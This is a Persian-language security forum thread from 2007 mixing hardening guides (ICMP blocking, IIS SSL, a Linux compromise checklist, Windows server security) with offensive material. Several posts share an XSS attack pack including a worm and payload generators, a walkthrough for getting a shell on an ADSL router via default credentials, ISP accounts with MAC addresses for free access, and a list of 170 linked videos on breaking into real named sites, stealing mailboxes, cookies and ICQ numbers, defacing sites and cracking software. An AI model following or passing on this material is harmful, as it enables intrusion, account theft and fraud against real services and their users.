بعد از انتخاب Assign در سطر مربوط به Block ICMP در ستون Policy Assigned کلمه ی Yes نوشته میشه بدین معنا که این Policy فعال هست.حالا اگر از روی هر کامپیوتری اقدام به Ping کردن کامپیوتر شما و یا کامپیوترهایی که از طریق کامپیوتر شما به شبکه متصل هستند بکنند تنها پاسخی که دریافت میکنند Request timed out هست.بدین معنا که بر روی IP ای که در حال Ping کردنش هستید کامپیوتری جهت پاسخگویی وجود نداره.
حالا اگر دوباره مایل باشید ICMP رو فعال بکنید می تونید روی Policy ای که درست کردید راست کلیک کنید و گزینه ی Un-assign رو انتخاب کنید.

pastoo
06-08-2007, 00:53
این مقاله رو Elite نوشته
به قول خودش سریع و ناقص https://shabgard.org/forums/images/icons/yahoo/smiles/1_002.gif
راجع به امن سازی بانک های اطلاعاتی MS SQL


برگرفته از سایت امنیتی شبگرد

pastoo
06-08-2007, 01:00
نحوه نوشتن شل کد در ویندوز! البته یکی از روش ها!

کار snake در گروه امنیتی شبگرد

pastoo
06-08-2007, 01:20
مقاله راجه به گرفتن شل از سرور ضمیمه ای برای این (http://www.sc0rpion.ir/tutorial-clips/get-shell-via-Transfer-shell-between-servers(Linux%20servers).rar) فیلم

pastoo
06-08-2007, 01:28
امروز تو این پست من برای شما یه XSS Pack آماده کردم که شامل موارد زیر است:
1-آشنایی با حمله XSS
2-فیلم آموزشی
3-اسکنر برای تست آسیب پذیری XSS
4-Yahoo Bug Worm
5-نحوه ی نوشتن کرم XSS
6-800 Bug XSS
7-برنامه هایی برای آنالیز کوکی ها
8-برنامه برای ساخت کدهای مخرب برای حمله XSS
9-مقاله Cross Site Tracing

امید وارم مفید واقع شود .

دانلود (http://rapidshare.com/files/46886877/XSS_Pack.rar.html)

pastoo
12-08-2007, 22:39
دوستان روشهایی اینجا بهتون میگم تحقیق که کردین اینجا اعلام کنید راهنمایی میکنم

لطفا بحث را به انحراف نکشید


Default IP: 192.168.1.1
Default Username: admin
Default Password: password
I have changed IP of router to 192.168.1.254 so here is my first session:
$ telnet 192.168.1.254
Trying 192.168.1.254…
Connected to 192.168.1.254.
Escape character is ‘^]’.
BCM96338 ADSL Router
Login: admin
password: ********
Once you are logged in you will see menu:


Main Menu
1. ADSL Link State
2. LAN
3. WAN
4. DNS Server
5. Route Setup
6. NAT
7. Firewall
8. Quality Of Service
9. Management
10. Passwords
11. Reset to Default
12. Save and Reboot
13. Exit
->

Hack # 2: Get out of this stupid shell menu script/program
Yup, it is stupid stuff and don’t waste your time hitting CTRL+C, CTRL+D keys, to get out of this script/program (break shell script), just type sh and hit enter key at arrow prompt ->
-> sh
And you will be taken to shell
BusyBox v1.00 (2005.09.20-19:57+0000) Built-in shell (msh)
Enter ‘help’ for a list of built-in commands.
#
Hack # 3: But where is my ls command…
Type ls or dir command,
# ls
ls: not found
# dir
dir: not found
They have removed the ls and dir command. But don’t worry you can use old echo command trick:
# echo *
bin dev etc lib linuxrc mnt proc sbin usr var webs
echo * is old trick which displays list of all files in current directory without using ls or dir command.
Hack #4: Looking for advanced web based configuration, use main.html
Yet another stupid thing, they have removed main.html from web based configuration. Basically main.html is use to configure advanced options of router like port forwarding, DNS setting, firewall etc.
Just type http://192.168.1.254/main.html (replace 192.168.1.254 with your actual router IP address) to get all advanced options.
Hack # 5: Get more information about router hardware and Linux
Since this is tiny device most of the userland command such as free, uname etc are removed. However /proc file system provides all information:
Display CPU Information
# cat /proc/cpuinfo
Display RAM Information
# cat /proc/meminfo
Display Linux versions
# cat /proc/version
Linux version 2.6.8.1 (root@localhost.localdomain) (gcc version 3.4.2) #1 Tue Sep 20 15:52:07 EDT 2005
Display list of running Processes:
# ps
Display list of all kernel module (drivers):
# cat /proc/modules
Hack # 6: Get more information about your network configuration
Display list of network interfaces
# ifconfig
Get default routing information i.e. find out your ISP’s router:
# route
Display Iptables rules
# iptables -L -n
Hack 6 : Secure your router
(A) Fire web browser such as firefox and login to web based interface. Type url http://192.168.1.1/ main.html (or 192.168.1.254/main.html)
(B) Enable Firewall
Click on Security > Ip filtering > Outgoing or Incoming > Click add
(C) Change default admin password
Click on Tools > Select Administrator and type the password. > Click apply
(D) Save changes and reboot router
Click on Management > Access Control > Password > Select Admin > Setup new password
Save changes and reboot router.
Quick reboot router with reboot command:
# reboot
See also:

pastoo
15-08-2007, 22:29
How to secure web sites with SSL(CA) on IIS
HTTPS

http://www.persianadmins.com/picarticle/ca.gif


برای مشاهده آموزش کلیک کنید (http://www.persianadmins.com/swf/https.htm)
برای دانلود آموزش کلیک کنید (http://www.persianadmins.com/swf/https.tar.gz)

لینک های پشتیبان

برای مشاهده آموزش کلیک کنید (http://behroozi.parsaspace.com/swf/https.htm)
برای دانلود آموزش کلیک کنید (http://behroozi.parsaspace.com/swf/https.zip)

Anti-Satan
22-09-2007, 09:23
با سلام خدمت مدیران و دوستان عزیز..من یک سری اطلاعات در باره نحوه عملکرد NAT در ویندوز سرور میخواستم ..البته به صورت کامل و مفید ..چون در کلاس هیچی نفهمیدم!!!

سوال شما در قسمت مقالات مفید شبکه توضیح داده شده لطفا ابتدا جستجو کنید

pastoo
27-09-2007, 02:29
اينم واسه اون دسته از دوستاني كه مقيم كرج هستند .
تمامي اكونتهاي ISP =GOOGLE رو براتون گذاشتم
تمامي يوزر ها همراه با شماره MAC مطابق هم SET كنيد تا مشكلي نداشته باشيد
راستي هنگام CONNECT به شبكه از شما USER , PASS
که برای امتحان شما از میخوام خودتون یوزر : ADMIN را کرک کنید و پسورد را پیدا کنید
راهنمایی : پسورد 128 بایتی است

با تشکر از جاناتان

pastoo
29-09-2007, 22:47
Installation of soks of ***** of server on vulnerable the system
http://video.antichat.ru/file1.html (http://video.antichat.ru/file1.html)

Code:
2. XSS- vulnerability in forums SMF 1.05
http://video.antichat.ru/file2.html (http://video.antichat.ru/file2.html)

Code:
3. XSS on Wapbbs. Forum vbulletin. Obtaining the password of the
privileged user.
http://video.antichat.ru/file3.html (http://video.antichat.ru/file3.html)

Code:
4. XSS on mail Yandex.Ru
http://video.antichat.ru/file4.html (http://video.antichat.ru/file4.html)

Code:
5. Sql injection in cursor php_.fusion
http://video.antichat.ru/file5.html (http://video.antichat.ru/file5.html)

Code:
6. XSS in forums FastBB
http://video.antichat.ru/file6.html (http://video.antichat.ru/file6.html)

Code:
7. XSS in forums XMB
http://video.antichat.ru/file7.html (http://video.antichat.ru/file7.html)

Code:
8. Interception of session on server pochta.ru
http://video.antichat.ru/file8.html (http://video.antichat.ru/file8.html)

Code:
9. Seizure IRC of the channel
http://video.antichat.ru/file9.html (http://video.antichat.ru/file9.html)

Code:
10. We rock mp3 free of charge
http://video.antichat.ru/file10.html (http://video.antichat.ru/file10.html)

Code:
11. COSMO chat. admin it did not advance the right
http://video.antichat.ru/file11.html (http://video.antichat.ru/file11.html)

Code:
12. Breaking of cursor new sploytom (ZENER)
http://video.antichat.ru/file12.html (http://video.antichat.ru/file12.html)

Code:
13. ExBB 1.9.1. PHP-inklhding into adminke and other vulnerabilities
http://video.antichat.ru/file13.html (http://video.antichat.ru/file13.html)

Code:
14. zmail.ru: Sniffer and session. We read strange letters.
http://video.antichat.ru/file14.html (http://video.antichat.ru/file14.html)

Code:
15. Service of the virtual postcards Vcard Lite. Part of 2.
http://video.antichat.ru/file15.html (http://video.antichat.ru/file15.html)

Code:
16. Service of the virtual postcards Vcard Lite. Part 1.
http://video.antichat.ru/file16.html (http://video.antichat.ru/file16.html)

Code:
17. [ FLASH ] rues on IBM AIX
http://video.antichat.ru/file17.html (http://video.antichat.ru/file17.html)

Code:
18. [ FLASH ] sequential of rues ispravlenym eksploytom
http://video.antichat.ru/file18.html (http://video.antichat.ru/file18.html)

Code:
19. Is utilized short hyphen. We make no invisible.
http://video.antichat.ru/file19.html (http://video.antichat.ru/file19.html)

Code:
20. Vulnerability www.chatmoscow.ru (http://www.chatmoscow.ru/)
http://video.antichat.ru/file20.html (http://video.antichat.ru/file20.html)

Code:
21. IRC. Mockery above Slader-Non
http://video.antichat.ru/file21.html (http://video.antichat.ru/file21.html)

Code:
22. Vulnerabilities SetccMS (XSS)
http://video.antichat.ru/file22.html (http://video.antichat.ru/file22.html)

Code:
23. Installation Apache, Php, Perl, Mysql to localhost
http://video.antichat.ru/file23.html (http://video.antichat.ru/file23.html)

Code:
24. Php- injection in the script of news CuteNews v1.3.1
http://video.antichat.ru/file24.html (http://video.antichat.ru/file24.html)

Code:
25. Method of the interpretation of khesha IPB 2..x and breaking the
forum
http://video.antichat.ru/file25.html (http://video.antichat.ru/file25.html)

Code:
26. Breaking Invision Power Board sploytom
http://video.antichat.ru/file26.html (http://video.antichat.ru/file26.html)

Code:
27. New vulnerability PunBB
http://video.antichat.ru/file27.html (http://video.antichat.ru/file27.html)

Code:
28. cuz uze google'n'yandex before askin ' stupid questions %)
http://video.antichat.ru/file28.html (http://video.antichat.ru/file28.html)

Code:
29. WWWThreads Bug
http://video.antichat.ru/file29.html (http://video.antichat.ru/file29.html)

Code:
30. Breaking phpBB 2.0.15 new sploytom
http://video.antichat.ru/file30.html (http://video.antichat.ru/file30.html)

Code:
31. Active XSS in LiveJournal.com
http://video.antichat.ru/file31.html (http://video.antichat.ru/file31.html)

Code:
32. Installation of ***** to unix the machine
http://video.antichat.ru/file32.html (http://video.antichat.ru/file32.html)

Code:
33. XSS in phpBB with use phpNuke
http://video.antichat.ru/file33.html (http://video.antichat.ru/file33.html)

Code:
34. Idea of defeysa of the site through the search demands!
http://video.antichat.ru/file34.html (http://video.antichat.ru/file34.html)

Code:
35. Defeys of the site through the vulnerability in PunBB (php include)

http://video.antichat.ru/file35.html (http://video.antichat.ru/file35.html)

Code:
36. Breaking OF LARGE BROTHER - tntbrat.ru. SQL - injection.
http://video.antichat.ru/file36.html (http://video.antichat.ru/file36.html)

Code:
37. Breaking hack-info.ru through PHP injection and GIF the file
http://video.antichat.ru/file37.html (http://video.antichat.ru/file37.html)

Code:
38. Breaking of the mailbox through the holes on the server
http://video.antichat.ru/file38.html (http://video.antichat.ru/file38.html)

Code:
39. SQL- Eng. in IPB 1. *, 2. *. Obtaining khesha of admina
http://video.antichat.ru/file39.html (http://video.antichat.ru/file39.html)

Code:
40. History of the breaking of one site
http://video.antichat.ru/file40.html (http://video.antichat.ru/file40.html)

Code:
41. XSS in MercuryBoard. New.
http://video.antichat.ru/file41.html (http://video.antichat.ru/file41.html)

Code:
42. Vulnerability IkonBoard. Reading it is file
http://video.antichat.ru/file42.html (http://video.antichat.ru/file42.html)

Code:
43. Error of khostera in tuning of system.
http://video.antichat.ru/file43.html (http://video.antichat.ru/file43.html)

Code:
44. Obtaining administrative privelegiy in paBugs
http://video.antichat.ru/file44.html (http://video.antichat.ru/file44.html)

Code:
45. Vulnerability phpBB in module downloads.php
http://video.antichat.ru/file45.html (http://video.antichat.ru/file45.html)

Code:
46. XSS in many search with- swing. It is in detail.
http://video.antichat.ru/file46.html (http://video.antichat.ru/file46.html)

Code:
47. Breaking phpBB new sploytom
http://video.antichat.ru/file47.html (http://video.antichat.ru/file47.html)

Code:
48. XSS in PunBB 1..x
http://video.antichat.ru/file48.html (http://video.antichat.ru/file48.html)

Code:
49. XSS in MercuryBoard 1..x
http://video.antichat.ru/file49.html (http://video.antichat.ru/file49.html)

Code:
50. Vulnerability in SR Guestbook
http://video.antichat.ru/file50.html (http://video.antichat.ru/file50.html)

Code:
51. Breaking of box on e-mail.ru (part of 2)
http://video.antichat.ru/file51.html (http://video.antichat.ru/file51.html)

Code:
52. Breaking of box on nm.ru (part 1)
http://video.antichat.ru/file52.html (http://video.antichat.ru/file52.html)

Code:
53. Seizure of the site through the injection in Zorum
http://video.antichat.ru/file53.html (http://video.antichat.ru/file53.html)

Code:
54. SQL injection in forums Minibb 1.6
http://video.antichat.ru/file54.html (http://video.antichat.ru/file54.html)

Code:
55. XSS in forums phorum
http://video.antichat.ru/file55.html (http://video.antichat.ru/file55.html)

Code:
56. XSS in forums He11.ru and LedForums
http://video.antichat.ru/file56.html (http://video.antichat.ru/file56.html)

Code:
57. XSS in vBulletin 2..kh.kh
http://video.antichat.ru/file57.html (http://video.antichat.ru/file57.html)

Code:
58. XSS in forums zorum
http://video.antichat.ru/file58.html (http://video.antichat.ru/file58.html)

Code:
59. Bases of work with John The Ripper
http://video.antichat.ru/file59.html (http://video.antichat.ru/file59.html)

Code:
60. Analysis vzlomanoy BD
http://video.antichat.ru/file60.html (http://video.antichat.ru/file60.html)

Code:
61. Registration KeySpy Generator
http://video.antichat.ru/file61.html (http://video.antichat.ru/file61.html)

Code:
62. Vulnerability in phpBB 2.0.12 (KEZ)
http://video.antichat.ru/file62.html (http://video.antichat.ru/file62.html)

Code:
63. Vulnerability in phpBB 2.0.12 (max_.pain89)
http://video.antichat.ru/file63.html (http://video.antichat.ru/file63.html)

Code:
64. We obtain seriynik for progi through ArtMoney
http://video.antichat.ru/file64.html (http://video.antichat.ru/file64.html)

Code:
65. We read strange letters on mail.ru through the sessions
http://video.antichat.ru/file65.html (http://video.antichat.ru/file65.html)

Code:
66. SQL injection in LedForums
http://video.antichat.ru/file66.html (http://video.antichat.ru/file66.html)

Code:
67. Example Post- Flood through DenyoLaunch III
http://video.antichat.ru/file67.html (http://video.antichat.ru/file67.html)

Code:
68. SQL injection in search.php in phpBB 2.0.6
http://video.antichat.ru/file68.html (http://video.antichat.ru/file68.html)

Code:
69. SQL injection in MercuryBoard 1.1.0
http://video.antichat.ru/file69.html (http://video.antichat.ru/file69.html)

Code:
70. Study of protection WinRAR 3..0b =)
http://video.antichat.ru/file70.html (http://video.antichat.ru/file70.html)

Code:
71. Second method of the theft of nikov in the chat room
http://video.antichat.ru/file71.html (http://video.antichat.ru/file71.html)

Code:
72. CHAT ROOM. Seizure of nikov.
http://video.antichat.ru/file72.html (http://video.antichat.ru/file72.html)

Code:
73. Presence s/n for WinZIP 8..0b
http://video.antichat.ru/file73.html (http://video.antichat.ru/file73.html)

Code:
74. We make patch for BlueFace (CodeFusion)
http://video.antichat.ru/file74.html (http://video.antichat.ru/file74.html)

Code:
75. We make patch for WinZIP 8..0b (CodeFusion)
http://video.antichat.ru/file75.html (http://video.antichat.ru/file75.html)

Code:
76. We penetrate in strange comp. through Remote Administrator
http://video.antichat.ru/file76.html (http://video.antichat.ru/file76.html)

Code:
77. Pincha no longer catches the antivirus
http://video.antichat.ru/file77.html (http://video.antichat.ru/file77.html)

Code:
78. Survey of bagov in cgi scripts.
http://video.antichat.ru/file78.html (http://video.antichat.ru/file78.html)

Code:
79. Idea of brutoforsa amperesecond through HTTP demands.
http://video.antichat.ru/file79.html (http://video.antichat.ru/file79.html)

Code:
80. As to drive away as'ku. One of the methods.
http://video.antichat.ru/file80.html (http://video.antichat.ru/file80.html)

Code:
81. By vlom with the aid of rAdmin Of brutforsera!
http://video.antichat.ru/file81.html (http://video.antichat.ru/file81.html)

Code:
82. one additional method to skachat' paid mp3 c of site mp3search.ru.
http://video.antichat.ru/file82.html (http://video.antichat.ru/file82.html)

Code:
83. Defeys on the rapid. Bagi on the server. Admin did not advance
right on the folders.
http://video.antichat.ru/file83.html (http://video.antichat.ru/file83.html)

Code:
84. Vulnerability of site on cursor runcms
http://video.antichat.ru/file84.html (http://video.antichat.ru/file84.html)


Code:
85. Story about troyane pinch 1.0
http://video.antichat.ru/file85.html (http://video.antichat.ru/file85.html)

Code:
86. The new vulnerability Mybb. XSS works in all browsers.
http://video.antichat.ru/file86.html (http://video.antichat.ru/file86.html)

Code:
87. Breaking IcrediBB (SQL-injection)
http://video.antichat.ru/file87.html (http://video.antichat.ru/file87.html)

Code:
88. Baga in the the guest MPM Guesbook Pro
http://video.antichat.ru/file88.html (http://video.antichat.ru/file88.html)

Code:
89. As to rock mp3 for free from site mp3search.ru
http://video.antichat.ru/file89.html (http://video.antichat.ru/file89.html)

Code:
90. Sql-injection on cursor Php-Nuke
http://video.antichat.ru/file90.html (http://video.antichat.ru/file90.html)

Code:
91. SQL-injection in forum Zorum
http://video.antichat.ru/file91.html (http://video.antichat.ru/file91.html)

Code:
92. XSS and SQL-injection MyBB the forum
http://video.antichat.ru/file92.html (http://video.antichat.ru/file92.html)

Code:
93. Seizure Flesch chat room (part of 2)
http://video.antichat.ru/file93.html (http://video.antichat.ru/file93.html)

Code:
94. Seizure Flesch chat room (part 1)
http://video.antichat.ru/file94.html (http://video.antichat.ru/file94.html)

Code:
95. XSS in the forums in sparenykh BB tags VBulletin 3.0. *
http://video.antichat.ru/file95.html (http://video.antichat.ru/file95.html)

Code:
96. As to become adminom of forum ITA V1.49.
http://video.antichat.ru/file96.html (http://video.antichat.ru/file96.html)

Code:
97. Vulnerabilities in Zeroboard.
http://video.antichat.ru/file97.html (http://video.antichat.ru/file97.html)

Code:
98. Video about the the new XSS in the forums in sparenykh BB the tags
http://video.antichat.ru/file98.html (http://video.antichat.ru/file98.html)

Code:
99. UNION in SQL demands. Example of work.
http://video.antichat.ru/file99.html (http://video.antichat.ru/file99.html)

Code:
100. Vozmozhye vulnerabilities in scripts Manlix.
http://video.antichat.ru/file100.html (http://video.antichat.ru/file100.html)

Code:
101. As to become adminom on the site made in Flat-nuke.
http://video.antichat.ru/file101.html (http://video.antichat.ru/file101.html)

Code:
102. Error of adminov with installation Guestbook v1.1. Defeys on the
rapid.
http://video.antichat.ru/file102.html (http://video.antichat.ru/file102.html)

Code:
103. Defeys for the small. Defeys on the rapid.
http://video.antichat.ru/file103.html (http://video.antichat.ru/file103.html)

Code:
104. Again PHPBB. if the provider of dull.
http://video.antichat.ru/file104.html (http://video.antichat.ru/file104.html)

Code:
105. XSS vulnerability in forum forum.antichat.ru (vbulletin 3.0.3)
http://video.antichat.ru/file105.html (http://video.antichat.ru/file105.html)

Code:
106. To the article about mail.ru. We steal Cooks in the chat room.
More detailed video.
http://video.antichat.ru/file106.html (http://video.antichat.ru/file106.html)

Code:
107. To the article about mail.ru. We steal Cooks in the chat room. We
become moderators chat.mail.ru.
http://video.antichat.ru/file107.html (http://video.antichat.ru/file107.html)

Code:
108. php inklyuding KorWeblog
http://video.antichat.ru/file108.html (http://video.antichat.ru/file108.html)

Code:
109. Breaking e-mail'ov 2. Sorting of passwords. Is utilized Brutus
(under Windows).
http://video.antichat.ru/file109.html (http://video.antichat.ru/file109.html)

Code:
110. Breaking e-mail'ov. Is utilized THC - Hydra.
http://video.antichat.ru/file110.html (http://video.antichat.ru/file110.html)

Code:
111. Vulnerability Ultimate PHP Board (UP v1.9
http://video.antichat.ru/file111.html (http://video.antichat.ru/file111.html)

Code:
112. Forum Russian Board Or as it is not necessary to write
authorization system. (found Max_.pain)
http://video.antichat.ru/file112.html (http://video.antichat.ru/file112.html)

Code:
113. As to obtain strange letters on ramblere
http://video.antichat.ru/file113.html (http://video.antichat.ru/file113.html)

Code:
114. LiteForum 2 (SQL-injection)
http://video.antichat.ru/file114.html (http://video.antichat.ru/file114.html)

Code:
115. We look passwords on forum Powered by Web Wiz Forums.
http://video.antichat.ru/file115.html (http://video.antichat.ru/file115.html)

Code:
116. Overcrowding of buffer. Theory.
http://video.antichat.ru/file116.html (http://video.antichat.ru/file116.html)

Code:
117. We steal UIN, having a base of the users
http://video.antichat.ru/file117.html (http://video.antichat.ru/file117.html)

Code:
118. As to steal the Internet on 445 port
http://video.antichat.ru/file118.html (http://video.antichat.ru/file118.html)

Code:
119. Baga ConfYmi 2.1
http://video.antichat.ru/file119.html (http://video.antichat.ru/file119.html)

Code:
120. We obtain root, I use sploita.
http://video.antichat.ru/file120.html (http://video.antichat.ru/file120.html)

Code:
121. Practitioner Flood
http://video.antichat.ru/file121.html (http://video.antichat.ru/file121.html)

Code:
122. VIDEO SQL Injection IPB 2.0. *
http://video.antichat.ru/file122.html (http://video.antichat.ru/file122.html)

Code:
123. Bagi of white resist- site mag.su
http://video.antichat.ru/file123.html (http://video.antichat.ru/file123.html)

Code:
124. Real breaking PHPBB
http://video.antichat.ru/file124.html (http://video.antichat.ru/file124.html)

Code:
125. SQL injection in forum IbProArcade
http://video.antichat.ru/file125.html (http://video.antichat.ru/file125.html)

Code:
126. Breaking PHPBB
http://video.antichat.ru/file126.html (http://video.antichat.ru/file126.html)

Code:
127. Fraud Online of games.
http://video.antichat.ru/file127.html (http://video.antichat.ru/file127.html)

Code:
128. Breaking of forum MiniBB
http://video.antichat.ru/file128.html (http://video.antichat.ru/file128.html)

Code:
129. SQL injection in the forum * He11.ru Forums v1.0 *
http://video.antichat.ru/file129.html (http://video.antichat.ru/file129.html)

Code:
130. Seizure of the site through through cosmo-chat. Continuation...
http://video.antichat.ru/file130.html (http://video.antichat.ru/file130.html)

Code:
131. XSS in forum ExBB 1.9.1 THE II rocking shell- A
http://video.antichat.ru/file131.html (http://video.antichat.ru/file131.html)

Code:
132. XSS in forum ExBB 1.9.1
http://video.antichat.ru/file132.html (http://video.antichat.ru/file132.html)

Code:
133. SQL-injection in forum phpBB 2.0.6
http://video.antichat.ru/file133.html (http://video.antichat.ru/file133.html)

Code:
134. XSS in forum Web Wiz Forums v7.7 on securitylab.ru
http://video.antichat.ru/file134.html (http://video.antichat.ru/file134.html)

Code:
135. SQL-injection in the popular forum UBB threads 6.2.3
http://video.antichat.ru/file135.html (http://video.antichat.ru/file135.html)

Code:
136. Fulfillment shell- commands through curved perl- script (sendmail)

http://video.antichat.ru/file136.html (http://video.antichat.ru/file136.html)

Code:
137. We obtain seriynik for progi (php-injection)
http://video.antichat.ru/file137.html (http://video.antichat.ru/file137.html)

Code:
138. XSS in the chat room on kc-camapa.ru
http://video.antichat.ru/file138.html (http://video.antichat.ru/file138.html)

Code:
139. Breaking of the site through cgi- error: paypy
http://video.antichat.ru/file139.html (http://video.antichat.ru/file139.html)

Code:
140. Seizure of the site through cosmo-chat
http://video.antichat.ru/file140.html (http://video.antichat.ru/file140.html)

Code:
141. We drive away paid script free of charge (ezUpload pro 2.2)
http://video.antichat.ru/file141.html (http://video.antichat.ru/file141.html)

Code:
142. Yuzayem random cgi-telnet =)
http://video.antichat.ru/file142.html (http://video.antichat.ru/file142.html)

Code:
143. XSS in the chat room on muz-tv.ru
http://video.antichat.ru/file143.html (http://video.antichat.ru/file143.html)

Code:
144. Breaking of the site through cgi- error: %00 of the byte
http://video.antichat.ru/file144.html (http://video.antichat.ru/file144.html)

Code:
145. Breaking of the site through php-injection and knowledge SQL
http://video.antichat.ru/file145.html (http://video.antichat.ru/file145.html)

Code:
146. We penetrate adminku of the news script Absolute Engine
http://video.antichat.ru/file146.html (http://video.antichat.ru/file146.html)

Code:
147. Breaking of site on cursor shad0wed portal 5
http://video.antichat.ru/file147.html (http://video.antichat.ru/file147.html)

Code:
148. Difeys through the injection in Advanced Guestbook 2.2
http://video.antichat.ru/file148.html (http://video.antichat.ru/file148.html)

Code:
149. Breaking of the school site through the vulnerability on home page
of teacher.
http://video.antichat.ru/file149.html (http://video.antichat.ru/file149.html)

Code:
150. Breaking of the site through standard PHP- injection.
http://video.antichat.ru/file150.html (http://video.antichat.ru/file150.html)

Code:
151. Obtaining root rights on server yargsm.ru
http://video.antichat.ru/file151.html (http://video.antichat.ru/file151.html)

Code:
152. 6 video recordings about the recent attack on the living
periodical.
http://video.antichat.ru/file152.html (http://video.antichat.ru/file152.html)

Code:
153. The fulfillment of the arbitrary code in Mcft Windows with working
WMF it is file.
http://video.antichat.ru/file153.html (http://video.antichat.ru/file153.html)

Code:
154. Demonstartsiya of the filling of shela to forums IPB of version
2.0.4 when the password of administrator is present.
http://video.antichat.ru/file154.html (http://video.antichat.ru/file154.html)

Code:
155. Breaking of program XoftSpy.
http://video.antichat.ru/file155.html (http://video.antichat.ru/file155.html)

Code:
156. Vparivaniye of troyana. Operation of vulnerability "not complete
way to the processor" Windows (total) commander.
http://video.antichat.ru/file156.html (http://video.antichat.ru/file156.html)

Code:
157. Obtaining adminki and the filling of shela in cursor e107
http://video.antichat.ru/file157.html (http://video.antichat.ru/file157.html)

Code:
158. Installation IRC of boat under Windows.
http://video.antichat.ru/file158.html (http://video.antichat.ru/file158.html)

Code:
159. Registration of program Advanced Security Level.
http://video.antichat.ru/file159.html (http://video.antichat.ru/file159.html)

Code:
160. interesnya idea about how it is possible to flood Shell to forums
phpBB of any versions, if there is access to the administratorskoy
panel.

http://video.antichat.ru/file160.html (http://video.antichat.ru/file160.html)

Code:
161. Breaking of paid hosting- provider with the use of old
vulnerability in phpBB on one of the sites of hosting and the curvedly
disposed server under control FreeBSD.
http://video.antichat.ru/file161.html (http://video.antichat.ru/file161.html)

Code:
162. "Admin Password Exploit" (author)
http://video.antichat.ru/file162.html (http://video.antichat.ru/file162.html)

Code:
163. Breaking e107 with use ImageManager/manager.php - the built-in
file is manager.

XSS is not used!
http://video.antichat.ru/file163.html (http://video.antichat.ru/file163.html)

Code:
164. Khalyavnyy Internet in the local network.
http://video.antichat.ru/file164.html (http://video.antichat.ru/file164.html)

Code:
165. Seizure of the IRK- boat, which repeats phrases =)
http://video.antichat.ru/file165.html (http://video.antichat.ru/file165.html)

Code:
166. Video about the breaking of server under control Windows 3.1
http://video.antichat.ru/file166.html (http://video.antichat.ru/file166.html)

Code:
167. Theft of the 6- marking icq through that attached to it e-mail.
http://video.antichat.ru/file167.html (http://video.antichat.ru/file167.html)

Code:
168. Use wwwhack based on example vBulletin.

http://video.antichat.ru/file168.html (http://video.antichat.ru/file168.html)

Code:
169. One additional hole in cursor e107.
http://video.antichat.ru/file169.html (http://video.antichat.ru/file169.html)

Code:
170. Theft it is no in the chat room through breaking e-mail'a (by
brutoforsom).
http://video.antichat.ru/file170.html (http://video.antichat.ru/file170.html)

منبع : antichat.ru

pastoo
06-11-2007, 11:27
در بعضی اوقات ممکن هست که سرور شما به خطر افتاده باشه و توسط یک سری از عملیات ماهرانه توسط یه هکر تحدید شده باشه که در این زمان شما باید یکسری عملیات طبقه بندی شده را بر روی سرور خود اعمال کنید که من یه چند مورد از اونها را که بسیار ساده و آسان هستن را به صورت چک لیستی برای سرور های لینوکسی در اوردم و براتون می زارم ; بنا براین این عملیات گاه گاهی که می خواهید سرور خود را از نظر امنیتی چک کنید خوب هست تا بتونین فعالیت های ناشناسانه و زیر روال هایی که روی سیستم شما در حال فعالیت هستند را ببینید .

1: چک کنید تا ببینید اگر مدارک و گواهی های سخت افزاری (System Information)موجود بر روی سرور شما ساختگی هستند شما باید CPU Usage را با صدور فرمان هایی مشاهده کنید بنابراین در applications/Scripts برای مقدار مصرفی CPU جستجو کنید .

کد:
Check for strange processes with ps -awux command.
مرحله بعد نوبت به دایرکتوری ها میرسه که مانند زیر عمل کنید .

کد:
Check your /tmp directory and also your /var/tmp directory for scripts/binaries copied there.
وقتی یک سرور از نظر امنیتی به خطر می افته بعضی از هکر ها اون را یه عنوان یه فضا برای IRC begining Of Tape در می ارن شبیه Psybnc یا eggdrop (دو ربات )که از پورت 6667 اتصال پیدا می کنند . بنابراین شما می تونین با اتصال کاربردی تون به این پورت توسط command زیر وضعیت را از هر لحاظ چک کنید .

کد:
#sockstat | grep 6667
اگر روی سرورتون ترافیک سنگینی وجود نداشته باشه شما می تونید از Netstat command برای تحولات پورت ها و
اتصالات بهره ببرید .

کد:
netstat -a#
مورد بعدی و مهمترین موردی که حتما بعد ها مقاله ای طی این موضوع می نویسم یک روش برای چک کردن سیستم شما در برابر روت کیت های تحت OS و تحت kernel است که پیشنهاد می شه حتما به صورت یک عادت در زمان های معینی یک rootkit finder بر روی سیستم نصب کنید برای مثال به این صورت :

کد:
/usr/ports/security/rkhunter
or

کد:
/usr/ports/security/RootkitRevealer
و در مرحله آخر سیستم خود را حتما به اسکنر خوبی مثل nmap چک کنید تا بتونید پورت ها را بهتر از قبل مدیریت کنید .
تشکر
L0pht
Snoop-Security
منبع : hostlibrary.com

pastoo
06-11-2007, 11:33
در اين مقاله سعي شده كه امنيت در يكي از محبوبترين سيستم عاملهاي ارائه شده توسط شركت مايكروسافت ، به اجمال و به صورت قدم به قدم مورد بررسي قرار بگيرد . اگرچه بررسي امنيت يك سيستم عامل در يك مقاله ، كار دشواري مي باشد ، اما مي توان از اين مقاله به عنوان يك مرجع سريع و check list استفاده نمود .

بطور كل ايمن سازي يك سيستم عامل براي ايفاي نقش سرويس دهنده در شبكه را مي توان به سه بخش تقسيم نمود كه دو بخش اول ضروري و بخش سوم بنابر احتياج مي تواند اجرا شود . براي شروع فرايند ايمن سازي بعد از نصب سيستم عامل ، مي توانيد اين مراحل را قدم به قدم به شرح ذيل اجرا نماييد .

بخش اول : ايمن سازي پايه

يكي از ابزارهاي اصلي در امنيت ، تشخيص هويت يا Authentication مي باشد . اين ابزار ، در تمامي پروسه هايي كه احتياج به امنيت دارند ، به عنوان اولين مرحله در ايجاد حداقل ترين لايه امنيتي ، به كار برده ميشود . authentication از زمان تولد - كه احتمالاً قبل از تولد حضرت مسيح (ع) بوده - ، تا كنون ، دستخوش تحولات و پيشرفت هاي زيادي گرديده و هر روز شاهد ابداع تكنيك ها و تكنولوژي هاي جديد در اين زمينه هستيم .
سيستم عامل به عنوان يكي از اركان اصلي سيستمها و شبكه هاي كامپيوتري ، از Authentication به عنوان ابزار اصلي تعيين سطوح امنيتي استفاده مي نمايد . بنابرين شروع كار ، با بررسي و ايمن سازي اين بخش خواهد بود .

